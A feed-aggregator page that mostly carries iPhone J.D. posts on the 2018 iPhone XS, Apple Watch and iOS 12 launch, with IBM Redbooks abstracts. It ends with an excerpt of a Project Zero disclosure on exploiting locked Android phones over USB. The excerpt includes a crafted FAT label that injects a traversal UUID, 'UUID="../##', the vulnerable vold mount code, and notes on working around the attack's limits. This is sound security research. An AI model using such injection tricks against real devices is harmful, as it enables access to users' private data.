Feed aggregator

In the news

iPhone J.D. - 8 hours 41 min ago

Many of Apple's newest products go on sale today, including the iPhone XS, the iPhone XS Max, and the Apple Watch Series 4.  (The iPhone XR will be available in stores starting October 26.)  Using the Deliveries app on my current iPhone, I've been monitoring my iPhone Xs this week as it went from Shenzhen, China to Anchorage, Alaska to Louisville, Kentucky, and as I type this it should soon be on an early Friday morning plane to New Orleans.  My own travel over the last few days has been far less interesting because my days have mostly been consumed with drafting appellate briefs.  This has been a crazy busy week in the world of iOS-related stories, thanks to the new version of iOS and watchOS that came out earlier this week, the numerous reviews written by folks who got early looks at the new iPhones and new Apple Watch, and tons of app updates to take advantage of the new features in iOS 12.  I've tried to select some of the most interesting items to feature in this collection of the news of note from the past week:

  • California attorney David Sparks posted a video review of the Elevation Labs Draft Table, a strong and sturdy stand that can tilt your iPad to various angles.  I like that it can be adjusted to different angles.  In my law practice, I mostly use my iPad Pro in two different angles.  First, when I taking handwritten notes, and sometimes when I am annotating documents, I prefer a slight tilt, and the Apple Smart Cover is perfect for that.  Second, when I am mostly reading things on the screen and doing some light annotation, I prefer a more upright position, and for that, I love the strong and sturdy Simplex Tablet iPad Stand by Thought Out (my review).  The Simplex only has one viewing angle, but I find that it is the only angle that I need other than the one I get with my Apple Smart Cover.  Whatever product you use, I think that getting your iPad in the right angle for the work you are doing is a key part of being more productive with an iPad in a law practice.
  • Suzanne Barlyn of Reuters reported this week that John Hancock, one of the oldest life insurers in North America, will stop underwriting traditional life insurance policies and instead will only offer policies that adjust the life insurance premiums based upon how much you exercise, as measured by a wearable device such as the Apple Watch.
  • To get you ready for your new insurance policy, let's start with some news items about the Apple Watch.  I wasn't surprised to see reviews of the new Series 4 Apple Watch this week by traditional media outlets, but I was surprised to see a review by Jon Hamm — yes, that Jon Hamm, of Mad Men — who talked to John Lonsdale of Men's Journal about his thoughts on the new device.  Hamm says:  "It’s not as chunky on your wrist, but the face is bigger, so if you have fat fingers like me, you can press those little buttons and it all works well."
  • Stephen Pulvirent of Hodinkee, who specializes in reviewing expensive watches, wrote a great review of the Series 4 Apple Watch.  The video which accompanies the review is beautifully-produced and informative.  Given his job, it is no surprise that he concludes by saying that he still plans to wear his Rolex most days, but he admits that he is going to keep a Series 4 charged and ready to go for certain days, and says that "Apple is on a trajectory where each new version of the Apple Watch gets more useful, cooler, more fun to wear, and we're on a path where at some point, it's just going to become indispensable.  And with the Apple Watch Series 4, Apple is showing us that that future is closer than we thought."  I've never owned a Rolex or other super-expensive traditional watch, and because I love wearing an Apple Watch so much, I'm quite certain that I never will.
  • Liz Plosser of Women's Health says that the new Apple Watch is a "powerful health and fitness accessory."
  • The new Series 4 Apple Watch looks amazing, but almost every Apple Watch model got better this week thanks to watchOS 5.  Alex Guyot wrote a comprehensive review of watchOS 5 for MacStories.
  • The other new Apple hardware in the news this week was the iPhone XS.  Rene Ritchie of iMore wrote a comprehensive review of the iPhone XS.
  • David Pogue of Yahoo reviews the new iPhone XS and, as always, includes one of his funny and goofy videos to go along with it.
  • Travel photographer Austin Mann shows that the new iPhone XS does a great job of capturing what people actually see with their eyes, thanks to the HDR improvements.
  • Former White House photographer Pete Souza took some amazing pictures for DailyMail with the new iPhone XS in Washington, D.C.
  • Almost every model of the iPhone got better this week thanks to iOS 12.  Jason Snell of Six Colors explains the improved search feature in Photos in iOS 12 which allows you to, for example, see pictures you have taken of dogs, and then refine that to just see pictures of dogs in the snow.
  • I love, love, love, love, love the deep integration of 1Password into iOS 12.  Ryan Christoffel of MacStories shows off how it works.  If you still don't use a password manager, now that iOS 12 is out, you really don't have an excuse.
  • Overcast was already my favorite podcast app, but it is now so much better with iOS 12 and watchOS 5.  I particularly love the ability to listen to podcasts using just my Apple Watch and my AirPods, which is great for doing tasks around the house without having to carry around an iPhone.  I haven't yet used this combination when walking or jogging outside, but I look forward to trying that out soon.  Zac Hall of 9to5Mac wrote a good review of what is new in Overcast on the iPhone and Apple Watch.
  • It's going to take me months to get my arms around the new automation that is now possible thanks to Siri Shortcuts and the Shortcuts app in iOS 12.  But as if that wasn't enough, Federico Viticci of MacStories figured out how to trigger IFTTT applets using Siri and the Shortcuts app, which gives you the ability to trigger hundreds of additional services and devices such as a Sonos, a Roomba, an online document, and more.
  • Steven Levy wrote a great article for Wired about the history of Apple's Infinite Loop campus, based on interviews with tons of folks connected with Apple.
  • And finally, here is a video produced by Apple which shows off the major new features of the iPhone XS in just one minute:

Categories: iPhone Web Sites

Initial reviews of the new iPhone XS

iPhone J.D. - Wed, 09/19/2018 - 02:12

A few days ago, Apple provided select members of the press with an iPhone XS and an iPhone XS Max so that they could post a review yesterday, shortly before the 2018 versions of the iPhone officially go on sale this Friday.  Review units were given to John Gruber of Daring Fireball (review), Matthew Panzarino of TechCrunch (review), Joanna Stern of the Wall Street Journal (review), Nilay Patel (a former practicing attorney) at The Verge (review), Raymond Wong of Mashable (review), John Paczkowski of BuzzFeed (review), Brian X. Chen of the New York Times (review), Lauren Goode of Wired (review), Todd Haselton of CNBC (review), and Scott Stein of CNET (review).  Here are my major takeaways from what these folks wrote after using the new iPhones for the last few days:

  • Many people found the camera to be much better than the iPhone X.  John Gruber was particularly impressed, and the photos that he provided as examples show that the iPhone XS produces noticeably better pictures than the iPhone X in situations in which HDR makes a difference — pictures in which you have both light and dark spots.  If you are taking pictures outside on a nice day, this may not matter very much.  But if you are inside with less light, this can make a big difference.  Similarly, Matthew Panzarino provided some stunning sample pictures and said that he thinks Apple "dramatically undersold how much improved photos are from the iPhone X to the iPhone XS.  It’s extreme, and it has to do with a technique Apple calls Smart HDR."  And Nilay Patel says that the "camera upgrades on the XS over the X are significant. The XS makes the X camera look terrible most of the time."  (Patel still prefers the pictures taken by the Google Pixel 2, but when I looked at his sample pictures, I preferred the iPhone XS picture over the Google Pixel 2 picture every time.  Just goes to show you that there is certainly a subjective element to an art like photography.)
  • On the other hand, some of the other reviewers were less impressed with the camera.  For example, John Paczkowski said that the iPhone XS pictures were better than ones he took with the iPhone X, and yet it was still "pretty hard to tell" the difference.  And Lauren Goode said that pictures taken with the iPhone XS were only "slightly improved from the iPhone X photos," although she did see a more noticeable improvement in portrait mode photos.
  • Considering that you can actually see how much better the pictures are in the reviews posted by folks like Gruber and Panzarino, I find myself believing that the iPhone XS camera really is a big improvement over the iPhone X, but only some of the time, and perhaps other reviewers were taking pictures in conditions in which the improvement was less noticeable.  As Joanna Stern noted:  "The smart HDR feature and new sensors did make for a more even and clear photo when shooting almost directly into brighter lights—plus crisper, more colorful low-light shots—but overall my photos looked similar to the ones I’ve taken with the X."  But she also found that autofocus and launching the camera is much faster.
  • If you like the idea of a bigger phone, the iPhone XS Max is a very nice bigger phone.  If you previously used a Plus model of an iPhone, then you know whether that type of size is too large for your hands.  But many reviewers, such as Brian X. Chen, said that after trying both, they preferred the iPhone XS size.  If you want an interesting perspective, check out the video at the top of the review by Joanna Stern in which she shows what an iPhone XS Max looks like in the hands of basketball player Gheorghe Muresan.
  • Only one reviewer, Todd Haselton, tested the improved water resistance of the iPhone XS.  He said that he put the iPhone XS "in a fountain about 1 foot deep for five minutes and it was totally fine after I took it out."
  • The screen on the iPhone XS supposed to be more durable.  Nevertheless, Joanna Stern reported that the screen on her iPhone XS Max cracked after “a minor fall onto wood."
  • The built-in speakers are noticeably better.  Raymond Wong says that there is more separation between the left and right channels.  And many reviewers noted that the sound is noticeably louder.
  • The iPhone XS is noticeably faster.  Raymond Wong notes that complicated games like Fortnite play better on the iPhone XS.  And Joanna Stern noted that even "[e]veryday actions are faster too — even just pressing the reply button in the Gmail app."  Several folks noted that Face ID is also faster and thus works better.
  • If you use a wireless charger, it will work better with the iPhone XS because the iPhone XS is more forgiving about where you place the iPhone on the charger.

My iPhone XS is supposed to be delivered this Friday.  In light of these initial reviews, I'll definitely be taking lots of pictures this weekend to see what I think about the improvements.  And I hope that I notice the speed increases in everyday actions, as Joanna Stern pointed out.

Categories: iPhone Web Sites

IBM Spectrum Scale Security

IBM Redbooks Site - Tue, 09/18/2018 - 09:30
Redpaper, published: Tue, 18 Sep 2018

Storage systems must provide reliable and convenient data access to all authorized users while simultaneously preventing threats coming from outside or even inside the enterprise.

Categories: Technology

iOS 12 will be released today, along with watchOS 5

iPhone J.D. - Mon, 09/17/2018 - 01:05

Today, Apple will release as a software update the latest version of the operating system for the iPhone and iPad, iOS 12.  Apple previewed the features of iOS 12 three months ago, and you can click here to read what is new.  Note that I discussed the new version of FaceTime in that post, but Apple has decided to wait a little bit longer before rolling out the group FaceTime feature.

The feature that I am most looking forward to is Siri Shortcuts.  I like the Workflow app, and now that it is built-in to the operating system it will be so much more powerful.  I like that iOS 12 will recommend shortcuts to you, making this feature accessible to everyone.  But I'm especially interested to see all of the great shortcuts that power users will be able to dream up and share.

Moreover, when apps are updated to support shortcuts, they can become much more powerful.  Here's a great example.  I often wear my AirPods to listen to a podcast or music as I am walking through an airport to catch a flight.  Wit the TripIt app installed on my iPhone, I can say "Hey Siri, upcoming flight" and TripIt will (1) tell my my next flight number such as Delta 123, (2) tell me how long I have before the flight departs, (3) tell me the gate number, and (4) tell me the flight's status.  (Note that #4, flight status, is only available if you pay for the TripIt Pro service, but the other features work for everyone.)  That is precisely the information that I want as I'm walking through the airport, and if I'm wearing my AirPods, Siri can just talk to me without me needing to look down at my iPhone screen.  And this is just one example of what the TripIt app can do with shortcuts.  And TripIt is just one of countless apps that will be updated to support shortcuts.  This is cool stuff.

I'm also looking forward to the improvements to notifications.  In iOS 12, they are even easier to manage and organize.

It's always a good idea to backup your device before you install a major new update such as iOS 12.  Last night, I backed up my iPhone and my iPad to my iMac so that I would be ready.  The update is typically available around 10am Pacific / 1pm Eastern, and I always recommend that you wait a few hours before updating because there have been a few times in the past when Apple had to pull an update shortly after release because a bug was discovered. 

watchOS 5

In addition to iOS 12, Apple is also releasing watchOS 5 today.  I discussed the major new features in this post.  There are fitness improvements, the new Walkie-Talkie feature, support for Siri Shortcuts, podcast support, improved notifications, and more.  Thus, if you already have an Apple Watch on your wrist, today it gets better.

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 09/14/2018 - 03:29

Early this morning, Apple started taking orders for the iPhone XS, the iPhone XS Max, and the newly redesigned Series 4 version of the Apple Watch.  I placed orders for an iPhone XS and the Series 4 Apple Watch.  At the time that I placed my orders, the delivery date for the iPhone XS and the aluminum version of the Series 4 Apple Watch was September 21.  However, I ordered the Stainless Steel version of the Apple Watch, and even though I placed my order immediately when the Apple Store opened, my Stainless Steel model has a delivery date of September 28 to October 2.  For folks looking to get the iPhone XS Max, I see that it did not take very long for delivery dates to go past September 21 for many of the configurations.  It will be interesting to see what kind of demand there is for all of the new products announced this week and how far back the delivery dates start to slip.  And now, the news of note from this busy week in the iPhone and Apple Watch world:

  • One of the notable new features in the Series 4 Apple Watch is the the ability to perform an EKG.  Christina Farr of CNBC has an excellent explanation of this new feature and what it can do.
  • In addition to selling AppleCare+ for the iPhone, Apple has started a new insurance program called AppleCare+ with Theft and Loss.  As the name implies, this program will cover two incidents of accidental damage, theft, or loss, although there is a deductible.  Get more information on the Apple website.
  • Christina Passariello of the Washington Post talked to Apple's design chief, Jony Ive, about the new Apple Watch.
  • Last year, Apple announced the AirPower charging pad, but it still hasn't been released, and most references to it were removed from the Apple website this week.  Mike Wuerthele of AppleInsider has some theories on why.
  • Readdle makes some of the most useful apps for attorneys including Scanner Pro (which I use on my iPhone every week, and sometimes every day) and PDF Expert.  Killian Bell of Cult of Mac reports that the company's apps have now been downloaded 100 million times.  Congrats, Readdle!
  • You can now use ApplePay at nearly all 7-Eleven stores, as reported by Juli Clover of MacRumors.
  • It is widely known that Apple is planning to open its own video streaming service in the future.  Ben Lovejoy of 9to5Mac reports that Apple just won its first Emmy award for Apple-produced content, this one for Carpool Karaoke.  I suspect that this won't be Apple's last Emmy for a TV show.
  • If you own an Apple HomePod, it's going to get better next week.  As Ryan Christoffel of MacStories reports, the device will gain support for multiple timers, phone calls, and the ability to play a song if you don't know the name but you do know a line of the lyrics.
  • Geoffrey Fowler of the Washington Post discusses the challenges with recycling consumer electronics such as iPhones and iPads containing lithium-ion batteries.
  • In what almost seemed like a response to that article by Fowler, Apple's keynote featured a presentation by Lisa Jackson, Apple's Vice President in charge of environment, policy and social initiatives.  (She is also the former administrator of the EPA.)  Horace Dediu of Asymco discusses the most interesting aspects of Jackson's presentation.
  • And finally, Apple released lots of videos in connection with this week announcements, but today I'm just picking one that is silly and fun.  The opening video for this week's keynote address features someone running across Apple's new campus in Mission: Impossible style.  (As Roger Fingas of AppleInsider points out, Apple took some liberties for the path used by this runner.)  The video is entertaining, and also gives you some good views of Apple's new campus:

Categories: iPhone Web Sites

Why lawyers will love the iPhone Xs

iPhone J.D. - Thu, 09/13/2018 - 02:41

There have been four times in the past when Apple has debuted a major new iPhone with a new hardware design, and then the next year has debuted an "s" model:  the iPhone 3GS, iPhone 4S, iPhone 5s, and iPhone 6s.  These "s" models contain new features, sometimes even new hardware features, but the main emphasis seems to be on deeply improving the prior year's model.  Many lawyers have told me that they buy a new iPhone every two years and prefer to buy on the "s" year because that is when Apple really perfects each generation of iPhone.  Yesterday, Apple debuted the new iPhone XS (pronounced "ten ess"), and it fits this model perfectly.  The iPhone XS answers the question of what can we do if we take the basic hardware of the iPhone X, with that beautiful OLED edge-to-edge screen, and then deeply improve it.

One of the most notable ways that Apple has improved upon the iPhone X model is by releasing three different versions of the iPhone XS.  The main model adds the typical types of improvements that we would expect for an "s" model.  But Apple also introduced two other versions of the iPhone XS:  one for people who want an even bigger screen called the iPhone XS Max, and one for people who to save some money but still get most of the good stuff called the iPhone XR.  Add to this that many of the older iPhone models are still available for sale at cheaper prices, and there is truly an iPhone for everyone.

I'll start by discussing the improvements over the iPhone X that exist in both the main model and the larger Max model — and most of these improvements also exist in the cheaper iPhone XR model.

Performance

For a while now, Apple has been designing its own CPUs, allowing the company to create amazing processors which make the iPhone more powerful every year.  For the 2018 iPhone, Apple has added the new A12 Bionic chip.  As you would expect, this new CPU is faster and more energy efficient than prior models.  But to give the A12 an additional boost, Apple added a the Neural Engine, a part of the CPU dedicated to the task of machine learning. 

Thanks to the Neural Engine, the iPhone XS can recognize patterns, make predictions, and learn from experience, and do all of this while performing five trillion operations per second.  In other words, the iPhone is smarter and faster.  The Neural Engine is especially useful for the camera (more on that below), but also allows the iPhone XS to perform more sophisticated computations.  Augmented Reality should be significantly better on the iPhone XS. 

Obviously this makes the iPhone better for CPU-intensive apps like sophisticated games.  But even if you are just drafting an email to a client, surfing the web, or looking at photos, a faster iPhone is a more responsive iPhone, which always makes an iPhone more pleasant to use.

Speaking of making the iPhone faster, the iPhone XS also adds support for Gigabit-class LTE, a faster version of 4G as 5G is still being developed.  My carrier, AT&T, currently has Gigabit LTE in 141 markets.  Gigabit LTE should be about twice as fast as 4G, up to 400 Mbps.  In the real world, I typically see LTE download speeds of around 150 Mbps where I live in New Orleans, whereas if I am close to the Wi-Fi router in my house I see wireless download speeds from my cable modem of around 330 Mbps.  I'll be curious to see if Gigabit LTE is just as fast as Wi-Fi at my house — and significantly faster when I'm not close to the Wi-Fi router — after I upgrade to the iPhone XS.

Camera

It is truly amazing how far the camera on the iPhone has come in the last decade.  Apple says that the newest iPhone has the best camera yet.  It looks like there are only minor improvements in the camera hardware.  Just like the iPhone X, the iPhone XS has two 12 megapixel cameras on the rear, one of which is a wide-angle f/1.8 lens and one of which is a telephone f/2.4 lens.  I love having that telephoto lens on my iPhone X, and if you haven't used an iPhone with this feature before, you'll love it.  There are so many times that I am taking a picture with my iPhone and I want to get closer — such as when I'm taking a picture of my daughter kicking the soccer ball when she is across a soccer field from me.  For both pictures and video, that telephoto lens is a nice feature.

The main thing that is new for the iPhone XS in terms of taking pictures is that the CPU features an improved image signal processor which does a heck of a lot more   As Apple noted yesterday, what really makes the iPhone camera better is the computational photography.  The new the iPhone XS performs up to a trillion operations on every photo you take.  For example, the iPhone XS adds a feature that Apple calls Smart HDR, an improved version of HDR photography.  Apple VP Phil Schiller describes it this way: 

So let's say you're taking a picture and the camera recognizes you're shooting a subject and the subject is moving.  You go to press down on the shutter and you get a picture instantly.  It's called zero shutter lag.  What the A12 Bionic is actually doing is shooting a four-frame buffer so it can capture that critical moment.  But the A12 Bionic is doing even more than that.  It's also capturing secondary inter-frames at the same time.  And those inter-frames are shot at a different exposure level to bring out highlight details.  And it's doing more than that.  It's shooting a long exposure so it can get better shadow detail as well.  And when you're taking that picture it's analyzing all of those, finding out how to match up the best parts of each and merge them into one perfect photo.  That's Smart HDR.  It is a breakthrough, and it makes taking photos easier than ever to get beautiful results.

Apple also showed off a cool new feature when taking Portrait Mode photos — photos in which the subject of your picture is in focus but the background is blurred, similar to the bokeh effect you get with a high-end SLR camera.  There is now a slider to adjust the amount of blurring in the background, so you can decide if you want to see some of the background details, or if you want your subject to really stand out.

Although I normally think of using the camera to take pictures, the front-facing camera is also critical for Face ID.  Apple says that thanks to the advanced A12 Bionic CPU, Face ID is faster and works better on the iPhone XS.  It would be great if this was a noticeable improvement, and I can't wait to find out for myself.

Dual SIM

If you travel internationally with your iPhone, it is sometimes useful to get a different SIM card when you are in another country so that you can avoid expensive roaming charges.  The iPhone XS has a traditional SIM card but also supports a second eSIM.  When carriers support it — and Apple announced that many are on board — you'll be able to use two SIMs at the same time, and the iPhone will intelligently switch between them depending upon the circumstances.  Thus, you should be able to use a cheaper data plan in another country while still receiving phone calls when people call your normal phone number.

More waterproof

I'm sure that Apple would prefer that you not dunk your iPhone into the ocean.  But over time the iPhone has become more resistant to water, and this year the improvement is enough for Apple to increase the IP Code from IP67 to IP68.  The first number refers to how dust-proof the device is, and the iPhone X was already at 6, which is the highest.  But the increase from 7 to 8 is a noticeable increase in liquid ingress protection, to use the technical words.  With 7, a device can go up to 1 meter deep for up to 30 minutes.  With the 8 rating, Apple says that the iPhone XS can go up to 2 meters deep for up to 30 minutes.

Apple isn't advertising the iPhone XS as something you are going to use on your next snorkeling trip as an underwater camera.  Having said that, there are plenty of IP68 cameras being sold on Amazon which specifically advertise themselves as being waterproof and designed for underwater photography.  In part, this is because there is a wide range of ingress protection which all falls under IP68, but I suspect that if you wanted to be daring and take an underwater picture with an iPhone XS, you may not damage your phone at all.

More importantly, if you accidentally drop your iPhone XS in liquid, there is a good chance that you can just let the phone dry out and then it will be fine.  Yesterday, Apple VP Phil Schiller said that the iPhone XS was tested in many liquids, including orange juice, tea, wine, and even beer.

iPhone XS Max

Before the iPhone X, I felt like I had an impossible desire.  I wanted a larger screen, but I didn't want the iPhone to be any larger so that I could continue to use it without stretching my hand too much.  The solution, as the iPhone X showed us, was to reduce the bezels so that you get more screen space than a Plus model inside of hardware that is the same size as a non-Plus model.

But there are some folks out there who don't mind the larger size of the Plus model, and for those folks, Apple has created the iPhone XS Max.  The iPhone XS Max is about the same size as an iPhone 8 Plus, but because of the edge-to-edge design, you get a larger screen.  While the iPhone XS has a 5.8" screen, the iPhone XS Max has a 6.5" screen.  That's not that far off from an iPad mini, which has a 7.9" screen.  While the iPhone XS has a 2436-by-1125-pixel resolution, the iPhone XS Max has a  2688-by-1242-pixel resolution.  (Both are at 458 ppi.)

In terms of physical size, the iPhone XS is 5.65" x 2.79" while the iPhone XS Max is 6.20" x 3.05".

iPhones with a Plus-size screen have been around for a while now, so I suspect that you already know whether or not you are someone who minds the larger hardware size.  If the larger size isn't too big for your pocket or purse, then spending an extra $100 for the iPhone XS Max might be perfect for you.

iPhone XR

If you like the idea of the iPhone XS but you don't want to spend $999 and up for the iPhone XS or $1099 and up for the iPhone XS Max, you'll want to consider the iPhone XR.  Apple didn't say what the "R" stands for, but I presume the idea is that it is one step below "S" and that sounds about right.  The iPhone XR has almost all of the new features that I mentioned above, plus almost all of the features which have made the iPhone X so great.  However, the starting price is $250 less than the iPhone XS:  $749.

Here is what you lose by saving that $250 over the iPhone XS:

  • Display.  Instead of the beautiful high-resolution OLED display with its rich colors and deep blacks, you get an LCD screen, which is the type of screen which Apple used to always offer before the iPhone X.  Apple says that the LCD screen in the iPhone XR is particularly good, but it still won't look as good as an OLED screen.  And while the iPhone XS can show HDR video, much like newer high-end TVs, the iPhone XR cannot.
  • 3D Touch.  You cannot push harder on the screen to bring up different options.  As a workaround, Apple says that you can tap and hold down on the screen for a certain amount of time to trigger the same options — not unlike the way it works on an iPad — and Apple even adds some haptic feedback to reinforce that you are using the substitute for true 3D Touch.
  • Size.  The iPhone XR is actually slightly larger than the iPhone XS with a 6.1" screen, but it is definitely smaller than the iPhone XS Max with its 6.5" screen.
  • Camera.  You only get one camera on the back, so you don't get the telephoto lens.
  • Less waterproof.  The IP rating is IP67, similar to the iPhone X.
  • LTE.  You just get regular LTE, not Gigabit-class LTE.

Having said that, it is not all compromises with the iPhone XR.  You also get one feature that you don't get with the iPhone XS (or the iPhone XS Max):  more colors.  While the iPhone XS comes in silver, space gray, or gold, the iPhone XR comes in blue, white, black, yellow, coral, and red.  And I understand from folks who saw the new iPhone XR in person yesterday that the colors are quite vibrant.  Keep in mind that if you are going to keep your iPhone in a case the whole time, you might not notice the color very much.

Conclusion

The new 2018 iPhones look to be great for any lawyer, or anyone else who is looking to get work done with an iPhone.  With the large, edge-to-edge screen, you can see even more of your documents, your email, etc., and the faster speed allows your iPhone to help you get your work done without getting in the way.  And thanks to the three different models, you can now decide whether you want to pay $250 less to give up a few features that might not even matter to you, or pay $100 more for an even larger screen. With all models offered in 64 GB, 256 GB or 512 GB capacities, you can decide how much space you want. (The 256 GB model is $150 more than the base price 64 GB model, and then 512 GB model is $350 more than the 64 GB model.)  And since I presume that you will also use your iPhone for non-work purposes, such as taking pictures of the kids, playing games, or using the latest Augmented Reality app, the new 2018 models are even better at those tasks.

If you currently use an iPhone X, you probably won't want to upgrade unless you enjoy having the latest and greatest.  But if you currently use an older iPhone, then you'll love using the iPhone X form factor, and as a bonus for waiting an extra year for the "s" model, you can get an iPhone which is significantly improved over the iPhone X with more options on size and price.

What am I going to get?  My current iPhone X typically has about 150 GB in use, so I know that the 64 GB model is not enough for me, and the 256 GB sounds just right.  I don't like a larger phone, but I do want that amazing OLED display.  Thus, I plan to get the iPhone XS in the 256 GB capacity, probably in space gray.

Apple starts taking orders tomorrow, September 14th, and devices will begin shipping on September 21st, for the iPhone XS and iPhone XS Max models.  If you want the iPhone XR, you can order starting October 19, and devices ship a week later.

Categories: iPhone Web Sites

How to Use IBM Cloud Object Storage When Building and Operating Cloud Native Applications

IBM Redbooks Site - Wed, 09/12/2018 - 09:30
Redpaper, published: Wed, 12 Sep 2018

This IBM® Redpaper™ publication presents a series of tutorials for cloud native developers just getting started with IBM Cloud™ and IBM Cloud Object Storage.

Categories: Technology

IBM Power Systems LC921 and LC922: Technical Overview and Introduction

IBM Redbooks Site - Wed, 09/12/2018 - 09:30
Redpaper, published: Wed, 12 Sep 2018

This IBM® Redpaper™ publication is a comprehensive guide that covers the IBM Power Systems™ LC921 and LC922 (9006-12P and 9006-22P)) servers that use the current IBM POWER9™ processor-based technology and supports Linux operating systems (OSes).

Categories: Technology

New iPhone (and more) to be announced today

iPhone J.D. - Wed, 09/12/2018 - 00:31

Today at 10am Pacific / 1pm Eastern, Apple will give a keynote presentation at the Steve Jobs Theater, part of Apple's new Apple Park campus in Cupertino, CA.  We will definitely see the 2018 versions of the iPhone, and I expect to see a new Apple Watch.  I'm sure that Apple will also say something about iOS 12, which Apple first previewed this past June and which I suspect will be released in the next week or so.

Other than that, I'm not sure what Apple will announce.  For example, I expect to see a new iPad Pro this year, but I don't know if we will see it today.  Sometimes Apple announced a new iPad and new iPhone at the same time, other times Apple holds back the iPad announcement until the next month.

Finally, it is always fun when there are surprise announcements, so I hope that something interesting is announced today that I wasn't expecting at all.

If you want to see the announcements live as they happen, click here to watch a live stream from the Apple website.

 

Categories: iPhone Web Sites

Turning Data into Insight with IBM Machine Learning for z/OS

IBM Redbooks Site - Tue, 09/11/2018 - 09:30
Redbook, published: Tue, 11 Sep 2018

The exponential growth in data over the last decade coupled with a drastic drop in cost of storage has enabled organizations to amass a large amount of data.

Categories: Technology

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

Google Project Zero - Mon, 09/10/2018 - 12:18
Posted by Jann Horn, Google Project Zero
Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).
After an Android phone has been unlocked once on boot (on newer devices, using the "Unlock for all features and data" screen; on older devices, using the "To start Android, enter your password" screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)
The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 ("directory traversal over USB via injection in blkid output")https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 ("privesc zygote->init; chain from USB")
These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).The attack surfaceMany Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn't necessarily complete):
  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel's filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold (one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.
The bug (part 1): Determining partition attributesWhen a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.
To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:
/dev/block/sda1: LABEL="<label>" UUID="<uuid>" TYPE="<type>"
However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid's output only scanned for the first occurrences of UUID=" and TYPE=". Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.The bug (part 2): Mounting the filesystemWhen vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel's vfat filesystem implementation should be able to mount, PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:
   if (mFsType != "vfat") {        LOG(ERROR) << getId() << " unsupported filesystem " << mFsType;        return -EIO;    }    if (vfat::Check(mDevPath)) {        LOG(ERROR) << getId() << " failed filesystem check";        return -EIO;    }    // Use UUID as stable name, if available    std::string stableName = getId();    if (!mFsUuid.empty()) {        stableName = mFsUuid;    }    mRawPath = StringPrintf("/mnt/media_rw/%s", stableName.c_str());    [...]    if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {        PLOG(ERROR) << getId() << " failed to create mount points";        return -errno;    }    if (vfat::Mount(mDevPath, mRawPath, false, false, false,            AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {        PLOG(ERROR) << getId() << " failed to mount " << mDevPath;        return -EIO;    }
The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.
This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is 'UUID="../##' into a locked phone, the phone will mount that USB stick to /mnt/##.
However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:
  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes 'UUID="' to start the injection, which leaves only five characters for the directory traversal - insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mounton permission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
